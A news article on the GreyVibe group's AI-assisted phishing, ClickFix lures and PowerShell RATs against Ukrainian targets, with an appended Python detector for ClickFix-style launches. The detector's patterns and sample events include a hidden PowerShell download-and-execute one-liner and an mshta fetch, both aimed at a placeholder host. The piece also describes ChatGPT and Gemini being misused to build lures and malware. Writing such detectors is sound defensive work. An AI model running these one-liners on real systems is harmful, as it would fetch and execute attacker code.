
Hackers using ChatGPT, Gemini to Execute Cyberattacks


AI technology is rapidly expanding, and so are cyberattacks. This rapid increase in cyberattacks around the world is facilitated by AI tools that make it easy to produce the digital artefacts behind fast, convincing and nearly untraceable attacks by Internet hackers.

With today's AI tools, anyone without prior coding knowledge can create software in a matter of minutes using tools like Replit, Claude, Gemini and more!

Recently, a likely Russian threat group tracked as GreyVibe was discovered using AI-generated lures and a rich set of custom malware tools to target entities in the military, government, civilian, and business sectors.

The cyberespionage campaign has been active since at least August 2025 and appears to align with Russian state interests, although researchers cannot confidently classify it as a nation-state operation.

Cybersecurity company WithSecure discovered the activity in January this year and determined that its focus is on Ukrainian or Ukraine-related organizations.

The link to a Russian-speaking threat actor is supported by the language for the malware panels, comments in code artifacts, and command-and-control (C2) server time configured to UTC+3 (Moscow time).

According to the researchers, GreyVibe has used several attack chains against its targets, including:

PhantomMail: Spear-phishing emails delivering malicious ZIP/RAR archives via Google Drive and 4sync links, using decoy PDFs or fake error messages while deploying malware. The observed lures impersonated Ukrainian government, emergency, telecom, and energy entities.

PhantomClick: Fake CAPTCHA/ClickFix pages disguised as Zoom and LAPAS sites that trick victims into running self-infecting commands through fake Cloudflare verification prompts.

PrincessClub: Fake Ukrainian adult/dating websites delivering FallSpy Android spyware and PhantomRelay/LegionRelay Windows malware. The operators used fake female Telegram personas and later added WebRTC-based live calls that could capture the victim's audio/video.

DroneLink: Fake Ukrainian military charity websites themed around FPV drones and UAVs, which shared infrastructure and tooling with the PrincessClub campaigns.

Nebo: Fake "СПО НЕБО" Russian military communications login pages, likely designed to trick Ukrainian military personnel into believing they were accessing a Russian military terminal.

The diversity and quality of these lures are notable, and WithSecure says this is the result of using multiple AI tools, including ChatGPT, Ideogram AI, and Google Gemini, to generate detailed and realistic content to support them.

The use of AI extends to the creation of tools as well, with the researchers mentioning LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP, all custom obfuscators that were likely developed with LLM assistance.

A PowerShell-based remote access trojan named LegionRelay was also likely developed with assistance from AI tools, the researchers say.

LegionRelay supports file theft, screenshot capturing, browser credential theft, Telegram and WhatsApp data exfiltration, and RDP access setup.

Another malware used by GreyVibe is PhantomRelay, also a PowerShell RAT. The malware supports system fingerprinting, dynamic script loading, and PowerShell and Windows command execution.

Picture showing a list of the malware used by GreyVibe to carry out cyber attacks on Ukraine – Photo credit: WithSecure

Finally, the hackers employed the FallSpy Android spyware in the PrincessClub and Nebo campaigns; it is designed purely for collecting intelligence.

The malware collects contact lists, call logs, device and network information, location data, media files, and SIM information.

WithSecure notes that while GreyVibe activity is consistent with a nation-state operation, the threat actor "lacked the level of sophistication and operational discipline typically associated with mature nation-state actors."

Furthermore, the PhantomRelay malware has been seen in cybercrime activity, although researchers could distinguish its usage from state-aligned operations. This led the researchers to believe that GreyVibe may include "current or former cybercriminal actors."

AI tools make it much easier for the GreyVibe hacking group to create this malware, these links and the highly convincing AI-generated media used to carry out cyber attacks on top Ukrainian government officials, military personnel and business people.

Picture showing the Gemini AI tools used to generate the AI media behind GreyVibe's cyber attacks – Photo credit: WithSecure

Some evidence pointing to this theory includes the use in early and test samples of a unique ISO builder associated with a group of former TrickBot members (UAC-0098) that targeted Ukraine at the start of the Russian invasion.

Furthermore, the threat actor uploaded development and test samples to a public scanning platform, which is not typical of nation-state actors. Additionally, a cryptocurrency miner was deployed on some victim machines.

The researchers are unsure "whether former or current cybercriminal members have been absorbed into a state-backed group, operate independently but with state-directed tasking, or have formed a hybrid team involving state-affiliated and cybercriminal members."

A Potential Disaster Looming from Rising AI-Powered Cyberattacks

AI-enabled cyber attacks have been on the rise in recent times. In Nigeria today, over 4,200 cyber attacks are carried out daily on Nigerian businesses, institutions, and citizens. These attacks have been made easy to orchestrate with AI-powered tools that readily write malware and create highly convincing media used to carry out cybercrime.

Recently, the Nigerian Corporate Affairs Commission suffered a major cyber attack carried out by the international cybercriminal group ByteToReach. This massive attack on the sole organization mandated to handle and safeguard Nigeria's corporate business information saw over 25 million highly sensitive business records and 750 GB of business data whisked away by the group.

This cyber attack by the likely Russian threat group tracked as GreyVibe, discovered to have been carried out using AI-generated lures and a rich set of custom malware tools, is targeted at top Ukrainian entities in the military, government, civilian, and business sectors. This further reveals how AI cyber attack tools can be used to promote data theft, insecurity, fighting and bloodshed.

What Organizations Facing AI-Powered Cyberattacks Should Do

AI-enabled cyberattacks are rapidly spiralling across the world. Organizations can set up defenses against GreyVibe's malicious activity by using the indicators of compromise (IoCs) provided by WithSecure. Furthermore, organizations should replace outdated cybersecurity systems with modern infrastructure and promptly train workers on the potential AI-powered attacks to look out for.
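As an added illustration of the defensive side of the PhantomClick chain described above and of the "set up defenses" advice here (example code written for this article, not WithSecure's tooling or anything from the group), this Python heuristic scores process-creation events for the ClickFix pattern: a script interpreter launched from explorer.exe (the Run dialog) with download-and-execute or hidden/encoded flags. The record fields and sample events are constructed, and the placeholder host example.invalid stands in for real indicators, which should come from WithSecure's published IoCs.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """Minimal process-creation record; field names are assumed, not a vendor schema."""
    parent_image: str
    image: str
    command_line: str

# Interpreters that ClickFix-style lures typically ask the victim to run.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe"}
USER_SHELL_PARENTS = {"explorer.exe"}  # Win+R (Run dialog) launches are children of explorer.exe
# Download-and-execute primitives commonly seen in pasted one-liners.
DOWNLOAD_EXEC = re.compile(
    r"\b(iex|invoke-expression|iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)\b|https?://", re.I)
# Flags that hide the window, bypass execution policy or obscure the payload.
EVASION = re.compile(
    r"-enc(odedcommand)?\b|-e\s+[A-Za-z0-9+/=]{20,}|-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-e(xecutionpolicy|p)\s+bypass", re.I)

def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, reasons); each independent ClickFix signal adds one point."""
    reasons: list[str] = []
    if _basename(ev.image) not in INTERPRETERS:
        return 0, reasons
    if _basename(ev.parent_image) in USER_SHELL_PARENTS:
        reasons.append("interpreter spawned by explorer.exe (Run dialog / user paste)")
    if DOWNLOAD_EXEC.search(ev.command_line):
        reasons.append("download-and-execute primitive in command line")
    if EVASION.search(ev.command_line):
        reasons.append("hidden-window, encoded or policy-bypass flags")
    return len(reasons), reasons

def is_clickfix_like(ev: ProcEvent, threshold: int = 2) -> bool:
    # Two independent signals is the alert threshold used here; one alone is too noisy.
    return score_event(ev)[0] >= threshold

def triage(events: list[ProcEvent]) -> list[int]:
    # Indexes of the events that should be raised for analyst review.
    return [i for i, ev in enumerate(events) if is_clickfix_like(ev)]

# Constructed sample events; example.invalid is a placeholder, not a real indicator.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", PS, 'powershell -w hidden -nop -c "iex (irm http://example.invalid/verify)"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe", "mshta http://example.invalid/captcha"),
    ProcEvent(r"C:\Program Files\Vendor\agent.exe", r"C:\Program Files\PowerShell\7\pwsh.exe", r"pwsh -File C:\scripts\inventory.ps1"),
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell"),  # user simply opened a shell
]
```

Running `triage(SAMPLE_EVENTS)` raises only the first two events; the benign automation run and a plain interactive shell stay below the threshold.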
